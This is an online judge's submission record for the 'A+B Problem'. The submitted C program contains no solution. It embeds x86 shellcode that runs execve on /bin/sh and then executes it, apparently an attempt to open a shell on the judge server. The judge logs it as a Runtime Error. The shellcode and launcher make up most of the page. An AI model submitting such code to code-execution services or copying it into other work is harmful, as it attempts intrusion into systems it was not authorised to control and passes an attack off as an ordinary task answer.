提交记录 17192


用户 题目 状态 得分 用时 内存 语言 代码长度
Hurrison 1000i. 【传统题】 A+B Problem Runtime Error 0 8.74 us 12 KB C++11 298 B
提交时间 评测时间
2021-12-05 19:25:10 2021-12-05 19:25:11

#include <stdio.h>
#include <string.h>
char sc[] =
  "\x31\xc0"
  "\x50"
  "\x68\x6e\x2f\x73\x68"
  "\x68\x2f\x2f\x62\x69"
  "\x89\xe3"
  "\x50"
  "\x53"
  "\x89\xe1"
  "\xb0\x0b"
  "\xcd\x80";
int main()
{
  void (*fp)(void) = (void (*)(void))sc;
 
  printf("Length: %d\n",strlen(sc));
  fp();
}

CompilationN/AN/ACompile OKScore: N/A

Testcase #18.74 us12 KBRuntime ErrorScore: 0


Judge Duck Online | 评测鸭在线
Server Time: 2024-04-25 01:08:29 | Loaded in 1 ms | Server Status
个人娱乐项目,仅供学习交流使用